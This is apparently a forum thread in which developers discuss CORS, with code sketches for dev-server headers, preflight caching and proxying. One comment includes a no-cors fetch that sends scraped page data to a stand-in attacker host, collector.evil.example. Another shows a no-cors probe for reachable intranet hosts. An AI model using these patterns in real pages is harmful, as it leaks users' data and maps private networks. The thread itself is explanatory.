What drives me nuts with CORS is there's no (easy) way to disable it in the browser for development purposes, e.g. when I want to run some scripts in a local HTML file to do some basic web scraping.
I was interested to learn about 'no-cors', where you get an opaque, mostly empty response. I was hoping to use it to find out whether a web page was being accessed from a client's internal network or not (by trying to fetch a page that only existed there and inspecting the response).
In the end I didn't get to find out if it worked or not due to boring reasons.
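The probe I had in mind was roughly this (hostname invented; note an https page can't fetch plain-http intranet URLs anyway because of mixed-content blocking):

  // With mode: 'no-cors' the response is "opaque": status 0, unreadable body.
  // All you can really observe is whether fetch() rejects at the network level,
  // which is (weakly) a signal for "does this host exist from where I'm sitting".
  fetch('http://intranet.example.local/only-here.html', { mode: 'no-cors' })
    .then(res => console.log('got an (opaque) response, type =', res.type))
    .catch(() => console.log('network error; probably not reachable from here'));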
At least Chrome and Firefox don't block it. I've recently used something similar as an add-on, until I did exactly what he said: manually setting an Access-Control-Allow-Origin: * header on that internal development server.
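For anyone else going that route, a minimal sketch of what setting that header can look like, assuming a Node/Express development server (all names invented):

  // Development-only middleware: answer every request (including the OPTIONS
  // preflight) with a wide-open CORS policy. Don't ship this to production.
  const express = require('express');
  const app = express();

  app.use((req, res, next) => {
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Headers', '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET,POST,PUT,DELETE,OPTIONS');
    if (req.method === 'OPTIONS') return res.sendStatus(204);
    next();
  });

  app.get('/data.json', (req, res) => res.json({ ok: true }));
  app.listen(3000);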
Do you know what's preventing it from working in Firefox Focus/Klar? The "Get Started" button does nothing unless tracker blocking (4 detected) is turned off. All tracker blocking options plus web font blocking are on, JavaScript is allowed, and cookies are allowed except 3rd party.
I hope some day to actually understand CORS. What it does. Why it exists. What good it does. It seems extremely weird to me that my web page cannot get a simple JSON file from my GCP VM which is just serving that file and nothing else.
The problem with cross-origin requests as I understand it essentially boils down to cookies. If cross-origin requests weren't blocked by default, any site you visit could send requests to your bank, for example. Since those requests would send auth cookies, they could potentially make changes to your bank account. So these requests are disabled by browsers unless the bank explicitly tells them (via CORS headers) that it's ok.
IMO the better way to handle it is by allowing cross-origin requests, but locking down cookies so they aren't sent cross-domain by default (ie by setting SameSite on cookies). For my services I generally open CORS up, but only implement authenticated requests with API tokens. The main problem is if you set a custom header (such as Authorization: Bearer) it triggers a preflight request. The only reasonable way I know around this is sending the token in the query parameters, but that also introduces some security issues.
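To make that preflight point concrete, a small client-side sketch (URLs and the token are invented):

  // A plain GET with no custom headers is a "simple request": the browser
  // sends it immediately, it just won't let the page read the response unless
  // the server answers with Access-Control-Allow-Origin.
  fetch('https://api.example.com/public');

  // Adding a custom header such as Authorization makes the request
  // "non-simple", so the browser first sends an OPTIONS preflight and waits
  // for the answer; that's the extra round trip.
  const token = 'example-api-token'; // hypothetical token
  fetch('https://api.example.com/private', {
    headers: { Authorization: 'Bearer ' + token },
  });

  // The SameSite lockdown happens on the server's Set-Cookie header, e.g.:
  //   Set-Cookie: session=abc123; SameSite=Lax; Secure; HttpOnly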
Let's say you're logged in to Facebook. Without the same-origin policy, any site you visit in your browser could send a JavaScript request to facebook.com/postmessage, posting messages as yourself without your knowledge or consent ;)
That's a problem, so browsers block cross-site requests by default; CORS is the mechanism a site uses to explicitly allow them.
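Roughly what that blocked request would look like (the endpoint is the hypothetical one above):

  // Running on some random site you visit. Because the JSON content type makes
  // this a non-"simple" request, the browser sends an OPTIONS preflight first;
  // since facebook.com doesn't allow that origin via CORS headers, the real
  // POST is never sent and the promise rejects.
  fetch('https://facebook.com/postmessage', {
    method: 'POST',
    credentials: 'include', // ask to attach your Facebook cookies
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ message: 'spam posted as you' }),
  }).catch(err => console.log('blocked by the browser:', err));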
Beautiful, definitely one of the clearest walkthroughs I've seen on CORS, with enough detail to understand what's going on with all those magic headers.
I've tried to deal with CORS, but I find it very confusing which setting covers which scenario and which side needs to send what.
Maybe I'm missing something obvious, but I was trying to get a PDF file embedded in an iframe, where the PDF and the web page are on the same server.
So what needs to be sent with the response for the web page containing the iframe tag? And what needs to be sent with the PDF file's response?
Also, I have some links that pull in styles from an external CDN (probably something I need to eliminate at some point, but those styles pull in font resources using relative URLs, and I'd need to untangle all of that to set it up locally, which probably isn't worth it at the development stage). These broke while I was experimenting with CORS.
I also have images and scripts and styles that are local.
Browser variations in handling the CORS headers, and conflicts between different headers, were something else I found confusing.
I just ended up disabling CORS, probably will look into it again when I'm preparing to move into production, but it really struck me as a frustrating time sink.
My main issue with CORS is the latency doubling introduced by preflight requests. I wish there was a more secure escape hatch for that than including things like access tokens in the query parameters[0].
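(Access-Control-Max-Age at least lets the browser cache a preflight answer per URL; a minimal Express-style sketch, endpoint invented:)

  const app = require('express')();

  // Answer the preflight and let the browser reuse this answer for the same
  // URL; note that browsers cap the value (Chromium around 2 hours, Firefox 24).
  app.options('/v1/things', (req, res) => {
    res.set('Access-Control-Allow-Origin', 'https://app.example.com');
    res.set('Access-Control-Allow-Headers', 'Authorization');
    res.set('Access-Control-Max-Age', '86400'); // seconds
    res.sendStatus(204);
  });

  app.listen(8080);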
That helps, but not for the first request at each endpoint, and for my use case I have many different endpoints. I wish there were an option to cache the preflight approval for subpaths, kind of like how you can make a cookie valid for any subpath under a specific path.
I think the usual approach is to proxy the other domain (or subdomain) to a path on your user-facing domain. E.g. if mysite.com is making requests to api.mysite.com, you would proxy api.mysite.com to mysite.com/api.
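A minimal sketch of that idea, assuming an Express front server on mysite.com and Node 18+ for the built-in fetch (GET-only, simplified; a real proxy would also forward methods, bodies, and headers):

  // Same-origin from the browser's point of view: the page on mysite.com
  // calls /api/..., and this server forwards that to api.mysite.com.
  const express = require('express');
  const app = express();

  app.use(express.static('public')); // the static frontend

  app.get('/api/*', async (req, res) => {
    const upstream = 'https://api.mysite.com' + req.originalUrl.replace(/^\/api/, '');
    const resp = await fetch(upstream); // server-to-server, so no CORS involved
    res.status(resp.status).type(resp.headers.get('content-type') || 'text/plain');
    res.send(await resp.text());
  });

  app.listen(8080);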
I'm building a pure backend service that I want app developers to be able to consume. If they have a static app, they shouldn't be required to run their own backend just to get around CORS. At the very least you're adding an extra hop, which is going to increase latency.
That said, it would be cool if static hosting services like S3 offered CORS proxies for uses like this. I wonder if that's a thing.
I just wish Chrome would finally implement CORS correctly.
The main compatibility problem between FF and Chrome I run into is that Chrome doesn't completely enforce CORS: it allows some requests it shouldn't if it were standards-conformant, and sites only test on Chrome.
One thing that confuses me about CORS is who it is trying to protect. I'd never really looked into it until recently, as I'd never done anything that needed a cross-origin request.
But recently I wanted to make a little web page that could control my Denon A/V receiver. The receiver has two or three different network APIs. There's one that uses telnet, and a couple of different HTTP ones.
You can point a browser at the receiver, and it gives you a page for controlling the receiver using one of the HTTP APIs. The API is reasonably fast, but the control page itself is glacial. A bit of poking around in the browser looking at requests and responses in the network monitor in the developer tools told me how to use that API.
The other HTTP API is used by the Denon mobile app. A bit of packet sniffing while using the mobile app told me how to use that API. Like the other HTTP API, that one is fast. The mobile app is also responsive, once it launches, but sometimes it takes a fair bit of time to find the receiver.
What I wanted was a simple web page, that I could stick on my website on Amazon Lightsail, which would just tell me the current source and volume, have buttons to switch between sources, and buttons for setting the volume. The page would use JavaScript to talk to the Denon.
Well, this was fine for changing inputs and volume, because those were simple GET requests. The Denon's web server doesn't implement CORS at all, so the responses lack any CORS headers, and the browser rejects them...but by that time the actual desired action has taken place on the server so I can just ignore the error.
For source and volume, that doesn't work because I need to get the returned data.
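In code the difference looked roughly like this (paths invented, the real Denon endpoints are different):

  // Command: the GET is actually sent and the receiver acts on it; the browser
  // then withholds the response because there are no CORS headers, so just
  // swallow the rejection.
  fetch('http://denon.local/cmd?volume=up')
    .catch(() => { /* blocked, but the volume already changed */ });

  // Status: here the blocked response is exactly the part I need, so the same
  // trick doesn't work; the .then() chain never runs without CORS headers.
  fetch('http://denon.local/status')
    .then(res => res.text())
    .then(xml => console.log(xml))
    .catch(err => console.log('blocked:', err));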
I flailed around for a while trying to find a way around this. Finally I gave up on the original plan of having my page on my outside website. Instead I stuck it on an RPi that is in my living room controlling a space heater and doing temperature monitoring, and put some server-side code on the RPi to control the Denon. The page then invokes that code on the RPi to do the actual commands to the Denon. The web page is only interacting with the RPi, so no CORS worries.
I probably got a bad impression of CORS from all this, but I can't figure out what it actually helps with. Let's say we have a site that came from site S, running in the browser of user U, and from there is trying to do a cross-origin request to site C.
It's not protecting C from anything I can see, because any restrictions C specifies in the CORS response headers depend on U honoring them to do anything. Someone trying to do something malicious with C could just ignore them.
It's not protecting U from scripts sending out personal information to C, because CORS doesn't block sending information if you send it in a way that doesn't trigger the preflight check, which is easy to do. It just blocks your browser from doing anything with the response.
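For example (hypothetical URL), this goes out with no preflight because it stays inside the "simple request" rules; the missing CORS headers only stop the script from reading the reply:

  // A "simple" cross-origin POST: form-style body, no custom headers.
  // The browser sends it (the data leaves the machine); CORS only prevents
  // this script from reading whatever comes back.
  fetch('https://collector.evil.example/log', {
    method: 'POST',
    mode: 'no-cors', // don't even ask to read the response
    body: new URLSearchParams({ stolen: 'whatever the script scraped from the page' }),
  });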
If a bad guy is able to get scripts to run in U's browser for a site from S, it does block those scripts from getting data from C (unless C says it is OK). But if the bad guy really needs their script to get data from C, they could just go through an intermediate server they control that relays data from C. They control the CORS headers on their server, and can strip the CORS headers that come from C.
What am I missing?
PS: the Denon control page came out nice, I think [1] (well, except the centering of the "Recheck status" button looks off a bit...never noticed that before). It's all flexbox layout that resizes reasonably, so it is quite usable on my iPhone, iPad, Surface Pro 4, and iMac.
> But if the bad guy really needs their script to get data from C, they could just go through an intermediate server they control that relays data from C.
Your browser has access to 2 things that the malicious actor's server doesn't:
1. your cookies (which it will normally send with any HTTP requests it makes)
2. your network position (for example if you're on a private corporate network and have access to some internal corporate servers)
FWIW, #1 is both easily fixed and AFAIK mostly already fixed (making cookies additionally scoped by origin of the requesting page, preventing "third-party cookies"). To the extent to which it isn't fixed, it should be fixed at that level.
> It's not protecting C from anything I can see, because any restrictions C specifies in the CORS response headers depend on U honoring them to do anything. Someone trying to do something malicious with C could just ignore them
U's browser will honor the CORS headers, unless U disables web security in the browser. If U visits a website with some malicious JS that tries to access C, that request will be blocked. One doesn't simply bypass CORS on the client side; the relevant headers are forbidden and can't be rewritten or worked around unless you use some proxy server.
You can still host your frontend wherever you want. The simplest solution would probably be to set up your RPi with just an nginx server that proxies requests to your devices and injects the CORS headers. But you already have it working so most likely not worth the effort to change it.